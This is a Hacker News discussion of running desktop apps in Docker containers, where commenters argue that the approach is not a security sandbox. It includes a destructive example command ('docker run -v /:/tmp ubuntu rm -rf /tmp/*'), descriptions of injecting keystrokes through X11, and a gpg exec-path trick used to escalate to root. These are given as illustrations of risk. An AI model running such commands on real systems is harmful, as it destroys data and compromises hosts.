Hacker News new | past | comments | ask | show | jobs | submit login
Docker containers on the desktop (jessfraz.com)
267 points by julien421 on Feb 21, 2015 | hide | past | favorite | 74 comments



This is not sandboxing. Quite the opposite, this gives the apps root access:

First of all, X11 is completely unsecure, the "sandboxed" app has full access to every other X11 client. Thus, its very easy to write a simple X app that looks for say a terminal window and injects key events (say using Xtest extension) in it to type whatever it wants. Here is another example that sniffs the key events, including when you unlock the lock screen: https://github.com/magcius/keylog

Secondly, if you have docker access you have root access. You can easily run something like:

docker run -v /:/tmp ubuntu rm -rf /tmp/*

Which will remove all the files on your system.


Just so everyone knows, this is Alex "I have a weird interest in application bundling systems" Larsson, who is doing some badass bleeding edge work on full on sandboxed desktop applications on Linux. :-)

http://blogs.gnome.org/alexl/2015/02/17/first-fully-sandboxe...

http://www.youtube.com/watch?v=t-2a_XYJPEY

Like Ron Burgundy, he's... "kind of a big deal".

(Suffer the compliments, Alex.)


Yes, I think that it is important to make this point around as docker gains popularity: security is not part of their original design. The problem they apparently wanted to solve initially is the ability for a linux binary to run, whatever its dependencies are, on any system.

It does try to keep containers separated but it does not enforce thatthrough a particularly strong mechanism.


AFAIK, breaking out of a Docker container isn't as trivial as the first part of your comment suggests. In particular, a Docker container can't run other Docker commands unless you grant it access with something like "docker run -v /var/run/docker.sock:/var/run/docker.sock".

Of course, there have been other vulnerabilities in the past allowing containers to get root. And the X11 weakness alone is enough to not treat this as a security layer.


I'm not entirely sure what Alex meant there, but I think his comment there was that the only way to be able to make use of this (at least until user namespace support lands in Docker) is for the user to have effective root on the system. So even if the sandboxing works, it's being done at a cost of requiring that, outside the sandbox, the users have an easy and passwordless way to gain root. This not only gives apps way more power than they had in the event of a sandbox escape mechanism (like the X11 socket), it also gives every unsandboxed app on the system way more power.

It's kind of like the general distaste for setuid binaries. If you have a correctly-written setuid binary, then you can use it to sandbox a process by, say, running it in a chroot. But if it's not correctly written, you have problems on your hands that far outweigh the problem you were originally trying to solve. So a random desktop app that ships with a setuid helper binary is going to be seen with suspicion. (Chrome is the only one I can think of that ships one, but they probably employ the people most qualified to write a bug-free setuid app, and they're getting rid of it in favor of user namespaces anyway.)

Of course, for the average developer desktop, processes probably have fifteen ways to gain passwordless root anyway. I certainly set sudo to nopasswd for convenience. :) So on a developer desktop, it's a nifty hack, although it doesn't gain you security against a malicious app/exploit. But as a general-purpose sandboxing approach, it's a bad tradeoff to make.


Its super easy to get out of this container. Just connect to the x socket, then look for a terminal window, the start injecting keyboard input into it.


If you break the app you have +- the same access.. see if you break irssi you're not root either.

This stuff is only sort-of reliable when-containers-dont-have-root-bug-today if you run that as a separate user than yourself in a different X server

So basically not cool.

The way GNOME is doing ACTUAL sandboxing is much neater. Turns out it doesn't use Docker also. Go figure /sarcasm.


Gnome sandboxing uses exactly the same technologies behind the scenes as Docker uses: cgroups, namespaces, ... They add the additional requirement that they need Wayland to circumvent the security issues that X11 presents them. Other than that, you could do it just the same way.

So your "when-containers-dont-have-root-bug-today" applies to Gnome too...

Also: there is no such thing as 'actual' sandboxing. There are many forms of sandboxing, containers (not docker-exclusive, as Gnome is using it exactly the same way) is one form, but we also know Virtual Machines, the Java VM, Javascript in a browser, ... the list goes on - all meaning the same thing: shield an application from everything else on the computer and try to prevent it from breaking out.


lol Alex I didn't give people commands to remove their root filesystem ;) also thanks for the overlayfs patch its amazing


Not sure what you mean, any user with access to docker can run processes as root, with any part of the host system mounted into the container. Now, that access was not added by you, but its required to be able to run your images.

Once you have the images running the code in them could easily break out of the container via X11, and do things like sniff all keyboard events and inject events into any app.

Of course, the apps you put in the images probably are not doing that. But people need to be aware that this is not a sandbox they can run untrusted code in.


yes but you are kinda ruining the point, this is a fun hack with Docker, take it or leave it, that's all.


You wrote, "I know that the rest of my system is completely unaffected from anything the app does." This is unfortunately not true.

It's a fun hack, and I think if you said it was a fun hack instead of a security measure you'd have gotten a different reaction. (I agree it's a fun hack! It's just not a security measure.)


The commands I give are fine.

The one Alex gives in his comment mounts root into a container, something I am not saying at all or even close doing at all. No one should ever mount root in a container, its common sense.


I spent a few years working on general-purpose security sandboxing for Linux desktop apps (as a master's thesis), and gave up. The problem is that there are a bunch of common-sense things like not giving access to the root filesystem, and a million less common-sense things that also give you the ability to escape the sandbox. It really sucks.

There's X11, as Alex mentioned. If you grant permissions to an app to use the X11 socket, it has the ability to inject keystrokes to any other application in the same X session. If you have a terminal open where you run "sudo", then the app can gain root.

Your gparted example gives the app access to the root partition. This allows it the ability to modify anything on the drive without going through the filesystem's security layer. It can go change root's password, modify setuid binaries, etc. It can then flush the disk cache by reading a lot of something else, ensuring that the next time the kernel wants to check root's password, it won't be cached.

Also, the state of the Linux kernel is such that if an app is running as UID 0 (even within a container), it probably has the ability to exploit some subtlety in the kernel interface to gain root. This is much reduced if you're using user namespaces (which, AIUI, Docker is not yet using), but it's still a risk. It's a huge risk without user namespaces.

If you trust the app, then you don't need an app (security) sandbox, which I think is what Alex is saying: "This is not sandboxing." If you don't trust the app, then Docker will not effectively restrict what the app can do to your system.


What did Alex say that hinges on you consciously mounting root into a container? Either you've given the unprivileged host user access to the Docker socket (implicitly giving permission to run any container, which enables a hostile to mount root inside a container) or you're running as the host's root user. This is, by my lights, an anti-sandbox--there's separation of file system (though not really any security not offered by the file system) at the cost of major privilege escalation and the kind of false empowerment that leads people to do dumb, risky things. And it really bears very little resemblance to the Apple sandboxing system to which you are attempting to equate it.

(EDIT: And the Dockerfiles are running the applications inside as root. As mentioned elsewhere, Docker doesn't currently use user namespaces, so an RCE in Google Chrome has just been upgraded to a root RCE because of this. Feeling safe?)

I generally don't subscribe to a particularly absolutist view of the world, but this is a real bad thing and I pretty strongly feel that somebody who works on Docker not explaining the ramifications of this misuse of the technology is pretty irresponsible.


Yeah, that's also an interesting point: in order to use Docker, the host user must have (effective) root capabilities on the host.

That ensures that any container-to-outside-user exploit can also turn into a container-to-root exploit.

If you have an X11 socket, then you can inject keystrokes to launch a new docker process that runs `rm -rf /`.

If you have write access to ~/.gnupg, as in the Mutt example, then you can edit ~/.gnupg/gpg.conf to set `exec-path ~/.gnupg/pwned`, so that keyserver helpers are looked up in that path, and then create an executable in that directory that runs docker to run `rm -rf /`. So the next time someone runs `gpg --search-keys` on the host....

Sandboxing applications is hard. There's a reason the only good UNIX sandboxes in general use are on iOS and Android, because they had no backwards-compatibility constraints, and even those sandboxes aren't perfect.


You didn't give the root command. But the app can easily send keyboard input events to your terminal window injecting that command.


That's not a Docker issue, that's an X11 issue. Unless you're using Wayland, you don't have much choice here.


You have lots of choices. Try making another X server with Xephyr and connecting to that, for example.


What is he ruining by pointing out security vulnerabilities in this "fun hack"? (Something you're claiming in that blog post is beneficial, so I'm not exactly buying your retroactive characterization here.)

This sort of thing is irresponsible without the proper explanation of the dangers involved.


Yes, see Qubes to understand the level of effort required for robust isolation between desktop AppVMs.


Totally. It's not a simple task, and what this post describes creates a threat model that I would generously term "dire."


"Take it or leave it" is cool if it is a game or "I like the font to be blue" or "you are using Haskell, why don't you use Javascript instead". They should totally leave it and move on.

But now. He mentioned a valid security issue and instead of being glad and acknoweledging it you are dismissing it. With security issues that is not cool.

It doesn't help probably that you put "Docker" or "microservices" in the headline it would get upvoted to the top.


This is neat.

But.

Docker isn't sandboxing in a security sense. It's sandboxing in a deployment sense: given a friendly app and a friendly host, the app can get an environment it wants without bothering the host to adapt too much. Given two friendly apps and a friendly host, the two apps can see different environments.

Given an unfriendly app, Docker is no different from running the unfriendly app directly.

I think the really cool thing about this is that, given how straightforward these examples look, you can use this as a deployment platform: go use whatever weird Linux distro you want, and still be able to run software that's only supported on an Ubuntu LTS.

But I think the comparison to Apple's sandbox is misleading, and also vaguely unfair to the good work that Apple has done in building a security sandbox.


> Given an unfriendly app, Docker is no different from running the unfriendly app directly.

I understand the risk of a kernel zero-day. But for Desktop apps, when used in conjunction with SELinux, can't Docker be considered to provide a level of sandboxing? In fact, I have not heard of any container breakouts. AFAIK, the only incidence that came close (but only worked on unpatched Docker) was https://news.ycombinator.com/item?id=7909622 and this was before their 1.0 release.

I'd like to hear your thoughts since a project I'm working on assumes that in a year's time containers will provide a Sandboxing alternative for server-side use. I can see some companies doing this already.

EDIT: X11 issues aside, as mentioned above by alexlarsson


Without user namespaces (CLONE_NEWUSER), which Docker currently doesn't use, uid 0 inside a container is the same thing as uid 0 outside it. If you let Docker run apps as root, which seems to be not uncommon, then it is, in a strong sense, the same as the root user outside the container. That's why Jessie's gparted process can partition her disk: as long as it can get at the device node, it has full permissions on it.

Apart from things that you've explicitly given it access to (like device nodes), the risk of zero-days is higher because these sorts of things aren't quite zero-days: it's not fundamentally a violation of the kernel's security model for uid 0 to be able to do root-y things. You might want it to be unable to, and you might mostly succeed by not exposing certain device nodes, using a process namespace (CLONE_NEWPID) so it can't attach itself as a debugger to other things on the system, etc. etc. But there's no intent in the kernel to make this safe. It's mostly an emergent feature of other things, and emergent features make bad security features.

What you can do is run as not root, which still makes you the same as some other UID on the system, but guarantees that you're not risking increasing privileges. User namespaces give you a few additional features here: first, even the process of entering a chroot / container doesn't require root or a setuid binary, which is neat. Second, even if you're root inside the container, you're not root on the host system in the same sense, and it's just kernel code that's checking for uid == 0 (which should almost all be gone, since they changed the uid_t type in userns-enabled kernels) that thinks you're root.

SELinux might be able to help you here, and I'm not really familiar with what the standard recommendations for SELinux and Docker are. I'd basically consider applying it as if the container didn't exist: if you're comfortable with something running as root with SELinux confinement, then it's definitely fine to run as root inside Docker with SELinux confinement. If not, I wouldn't risk it.

For server containment, you should take a look at https://sandstorm.io/ , which uses user namespaces and runs apps as uid 1000 inside the namespace. This means that it's running with no more privilege than the host user in the worst case.


The reason you don't hear about Docker breakouts is because Docker never claimed to be a secure sandbox in the first place, so a breakout is a non-event.

Note that local privilege escalation exploits in Linux are found regularly, like on a monthly basis, and every one is likely a Docker breakout.

geofft mentioned Sandstorm -- my project -- which actually does claim to be a sandbox, and isn't affected by most of these kernel exploits. Here's a blog post discussing the differences:

https://blog.sandstorm.io/news/2014-08-13-sandbox-security.h...


I hate that the isolation of containers gets oversold as a security feature because there is real value in what you might call "configuration isolation".

Often, I am reluctant to run something not because of a trust issue but a complexity issue. I run a heavily customized environment. I will often be burned by an application---for example---creating a symlink that under "normal" circumstances is perfectly copacetic but all but destroys some carefully crafted aspect of my environment. Similarly, isolation that is not up to the task of stopping evil is often more than adequate for stopping stupid (e.g., the recent "Steam deletes your home directory" issue). How often have you updated your system only to have one or two apps misbehave? With what jessfraz presents here, yum and apt become tools you can apply selectively. There are real non-security benefits to be had.

I realize that part of the oversell is the nature of hype but I can't help but feel that a---perhaps---equal part is that talking about these kinds of benefits is a more subtle and nuanced conversation.


ha! Though what's more common? Evil or stupid?

I'd say evil, people don't automate stupid.


Ignoring X11 security, I have also used this technique successfully in certain situations. See: https://github.com/samtstern/android-vagrant

That allows anyone on Linux to download, install, and run Android Studio with a single 'docker run ...' command, and for Mac/Windows users to do the same within a VM using just 'vagrant up'. It's not something I'd use to run Android Studio myself, but it's great to get someone quickly up and running without messing with all of the environment headaches (Android SDK location, Java version, etc).


Yes, it sounds great for teaching an introductory class, trying to keep things as lightweight as possible if students want to work on it on their own machines.


The need for stuff like Docker is an admission that OS privilege isolation and resource management is woefully inadequate.



What i find odd is that he is ranting as if it is a code problem when it is a package manager problem.

Unless i am badly off the mark, ld will use soname to tell lib v1.0 from v1.1 or v5.97. But the problem is with package manager flatly refusing to have anything to do with installing multiple lib versions side by side.

That is, if they have the same package name. End result is that one distro use glib3.xyz to designate glib 3.x, while another use glib-3.xyz Yet another use glib.3.xyz.

They all hold the same files, but for the package managers they are different packages. And will resolve dependencies based on that.

Applying containers and/or sandboxes to this is a Will E. Coyote solution...


It is not just this. It is also that RHEL 6 will have libfoo4, while Ubuntu 14.04 will have libfoo6, and then Debian Wheezy will have libfoo5. Even if the way the packages dependencies were expressed (libfoo-1-3 vs. libfoo3) were the same, the constant ABI breakage would be harmful.


But that problem is largely because of what i started out with, that their package managers can't handle having multiple version of libfoo installed under the same package name. Even tough ld and friends can via soname.

So they "avoid" it by insisting on using a specific version for the duration of the distro version.


25:50 as well.


Actually, everything that enables Docker is provided by the OS. AppArmor, SELinux, cgroups are all isolation capabilities provided by Linux. What you're seeing is libraries building on it finally becoming high-level enough that regular people are able to take advantage of them.


Right, but the fact that such large ecosystems have originated out of these high-level abstractions (on top of Docker you have all the container clustering and orchestration platforms, homegrown PaaS and whatnot) shows that there is indeed something lacking.

What the OP probably meant is that none of these solutions are actually a seamless part of the workflow when using the OS.


Isolation is possible in a multi-user system with text-mode apps (ncurses and such), just xorg presents a privilege hole that can't be easily plugged. One way to do it may be to run a separate instance of X inside the container and access it via VNC from the host system.


It looks like the situation is somewhat better in Wayland?

http://mupuf.org/blog/2014/02/19/wayland-compositors-why-and...


Absolutely. This was one of the main reasons that the Wayland protocol was written.


Wayland is another, probably simpler, alternative.

One thing, though: Docker itself presents a privilege hole that can't be easily plugged, too. That's a large part of why I've expressed alarm upthread.


In a recent article on sandboxing in linux [1] it was mentioned that "X11 is impossible to secure". I'm not sure how deep that goes, or whether it's relevant to what's been done here.

Could someone more knowledgeable comment?

[1]: http://blogs.gnome.org/alexl/2015/02/17/first-fully-sandboxe...


Basically, all the clients that connect to an Xserver has full trust in each other. You can sniff on any event sent to any client, and send fake events (that are not detectable as fake) to any client, as well as read all the contents of any windows. This essentially means any client can do whatever the user can do.

People have tried to make it more secure in various ways (trusted X, selinux X), but it is impossible because so much of the way X does things like DnD, cut-and-paste, window managers, etc that its just not possible to separate clients from each other without the entire thing breaking.


Wayland will eventually fix/mitigate this, correct?


Wayland sessions are separated from each other.


It's impossible to secure direct, unfiltered access to the X11 protocol: the protocol, by its nature, involves no access controls on who owns what widgets, who gets to inject events, and so forth.

There is a "SECURITY" extension to X11, which is what's (often) used when you run ssh -X instead of ssh -Y. It doesn't quite support everything; I fairly often saw things like emacs crash when run with ssh -X. Furthermore, it provides only a single isolation boundary. Every app running with the security extension has access to each other. So, for this sort of use case, the best you could have is that all your Dockerized apps can mess with each other, but not with processes on the host, which isn't quite what you'd hope.

There's "security-enhanced X", but basically imagine SELinux applied to each widget on your screen (which is what it is). If you think making SELinux usable and secure is hard, you won't look forward to this.

I sketched a design a while ago for doing protocol-level filtering of X where each app effectively lived in its own namespace. Widgets, resources, etc. created by one app are inaccessible to another, because they're not nameable. A middle layer translates each name into a name in a common global namespace, so the X server is unmodified. I think this is doable but a lot of work, especially given how many extensions are in the X protocol. It also doesn't really help you if, say, your OpenGL stack isn't good at isolating one app from another.

I think the other promising approach is to use a remote-desktop like solution (like Xpra, or x11vnc, or something) which spawns a separate X11 server, and screen-scrapes it and passes it to the host. You lose a few things like OpenGL, and the overhead might get prohibitive if you run one X server per app, but the isolation is pretty solid.


Basically, you shouldn't rely on techniques like this to protect you against a malicious app. You can rely on techniques like this as one more step to protect you against stupid mistakes, and to help you keeping configurations etc. isolated and make upgrades easier.


I would say it doesn't even do that, given that you're having to give root-level access to an unprivileged user to do it.


This conflates two different things. You effectively get root-level access if you are allowed to execute Docker, that is true. But things running in Docker does not have to be given root-level access - you can just as well run things inside Docker as a regular user.

I'm not an unprivileged user on any machine I operate in any practical sense, nor are most Linux desktop users, so to me that point is largely moot. That is, even if I'm technically not root most of the time, if I run a malicious app it can relatively easily set up plenty of traps in my home directory to get me to run whatever code it want with elevated privileges sooner or later anyway. So from the outside, having the ability to run Docker does not expose me much more - get my user account, and chances are you get root if you're not completely inept.

That doesn't mean it wouldn't be good to get a better/more fine grained privilege model for Docker for other use cases.

Inside Docker containers, nothing stops us from having everything run as a regular user, though admittedly many Docker containers errs and runs everything as root often for no good reason (especially given that Docker's port forwarding/mapping means a lot of daemons that otherwise at least wants to start as root - even if it could be avoided - have even less reason to be started as root)

But even running as root, assuming an app that isn't malicious, barring me stupidly mounting "/" to a volume in the container, it won't e.g. do things like accidentally deleting [major system directory] (as some app did a while back), even if the app in the container is running as root (which is largely unnecessary, though admittedly done too often, in Docker containers).

It also won't barf files all over my filesystem for no good reason. And I won't accidentally expose ports I don't want to expose. Amongst many other things


> I'm not an unprivileged user on any machine I operate in any practical sense, nor are most Linux desktop users, so to me that point is largely moot. That is, even if I'm technically not root most of the time, if I run a malicious app it can relatively easily set up plenty of traps in my home directory to get me to run whatever code it want with elevated privileges sooner or later anyway.

I don't know how to say this in a way that isn't snarky, but: be better about your operational security, then. I run all of my Unix machines with the exception of the Mac I don't care about with a user not in /etc/sudoers. That you're tripping yourself up is your own fault.

That doesn't excuse this sort of recklessness being advocated by a Docker employee.


Aside from the security issues with X11 I've never had a good experience from a usability perspective with X11 on OS X. Basic actions like resizing windows need to offer a native-quality experience before mass adoption can happen. Disclaimer: I'm not sure if this was a limitation of the apps or of X11


This reminds me of the subuser project (http://subuser.org/) which is basically about using Docker to achieve sandboxing - the project is effectively aiming to build a linux package manager out of Docker.

Several commenters have pointed out the very real security issues with opening the X11 port. This is true, but you could use ssh forwarding or VNC (at a considerable performance penalty). I believe the other security issues (mainly related to PID 0 and which user processes are run at) will be solved shortly. Running applications in Docker is never going to be as secure as running an app in a full VM, but it can definitely be better than trusting random code on the internet (the recent Steam client issue springs to mind).


You can also use just LXC to do the same: https://www.stgraber.org/2014/02/09/lxc-1-0-gui-in-container...


Are Docker containers actually sensibly secure as sandboxes? I thought there were still some gaps that needed to be closed in the underlying tech for it to be as safe as virtualization?


It's a lot better than no attempt at sandboxing, but ultimately you're still at the mercy of a late addition to the linux kernel (cgroups), which isn't exactly the safest codebase to make major changes like this in.

Denial of Service attacks are probably more straightforward than in a virtualized environment; I'm sure you could find a way to starve the kernel for something.

That said, there's currently no trivial "now I'm root on the host box" option or anything.


I've said this elsewhere in the thread, but this is not better than "no sandboxing". "No sandboxing" doesn't run applications as PID 0 in the host kernel.

Please stop repeating this. Docker is not a security tool, apparently by their own decision. It hurts people to have that be part of the common knowledge.


"Docker does not support user namespaces"[1] so root inside a container == root on the host. Getting security right with user namespaces is hard though[2].

And as another commenter pointed out, you can't give a user permission to actually start a docker container without also giving them root access to the host.

[1] https://docs.docker.com/articles/security/ [2] http://lwn.net/Articles/626665/


For my part what I care most about with Docker is not the ability to run something I don't "trust". That is, I would not trust or expect it to be safe enough to run code I expect to be malicious.

For me it's about creating a setup that is far more easy to reproduce in the face of e.g. system upgrades, setting up a new machine, as well as protection against stupid mistakes, and about containing state.


These are great - I'm already using docker containers for nearly everything I do for development, and now I'm inspired to continue the trend into all the other applications on my system. They're more portable (I keep my zsh aliases in github) and it'll keep my Arch/i3 install cleaner too. Thanks for the tips. I think my next step will be to start assigning the apps to their own workspaces in i3. Great post.


https://www.usenix.org/legacy/events/atc10/tech/full_papers/...

Abstract

Desktop computers are often compromised by the interaction of untrusted data and buggy software. To address this problem, we present Apiary, a system that transparently contains application faults while retaining the usage metaphors of a traditional desktop environment. Apiary accomplishes this with three key mechanisms. It isolates applications in containers that integrate in a controlled manner at the display and file system. It introduces ephemeral containers that are quickly instantiated for single application execution, to prevent any exploit that occurs from persisting and to protect user privacy. It introduces the Virtual Layered File System to make instantiating containers fast and space efficient, and to make managing many containers no more complex than a single traditional desktop. We have implemented Apiary on Linux without any application or operating system kernel changes. Our results with real applications, known exploits, and a 24-person user study show that Apiary has modest performance overhead, is effective in limiting the damage from real vulnerabilities, and is as easy for users to use as a traditional desktop.



I was missing a docker container that hosts the Xserver and produces the X socket for the other GUI containers. This would be great for non-gui docker management platforms such as CoreOS.


Would this be a good way to deploy an opencv based solution?

I spent an entire day getting opencv with Python bindings installed on my Mac and I'm dreading deploying it anywhere else.


Not sure if there are graphical interfaces pieces to your application that need to be considered, but in general Docker is very helpful for problems like that ("I set this up once and god help me if I can ever set up the dependencies and configure my system the same way again").


What is missing (technically) in order to be able to distribute 1-click GUI apps for Windows, Linux and OS X as docker containers?


Docker doesn't directly do cross-platform: the Docker API is the Linux kernel userspace API. If you want to run Dockerized apps on OS X or Windows, then you're using boot2docker, which is a distribution of Linux running inside a VM.

So most of the question is whether you're happy with this as a distribution mechanism. The best you'll be able to do is something like VMware's Unity mode, which isn't bad, but isn't good either. Alternatively, you could run an X11 server on Windows (via Cygwin) and OS X (Xdarwin), but that's also going to look very non-native.

If you're not, then there's an open technical problem of how to make it look reasonable. I'd consider whether browser-based desktop apps are an option: you can require a recent Chrome or Firefox, come up with three common launchers for each platform (think PhoneGap), and then run the Linux backend inside a VM on Windows and OS X. But that seriously restricts the set of apps that are in scope, and at that point, you might also try just building a cross-platform backend (using Go, maybe?).


Has anyone built a GUI wrapper for Docker that would allow someone to one-click an app like this on a Win/Mac desktop?


There is Kitematic for Macs, but it requires VirtualBox: https://kitematic.com


This is a great idea. I think the criticisms should be more ideas for improvement because this is definitely the future.


I sure hope that it isn't, we need simple things, not layers of complexity.



what the fuck




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: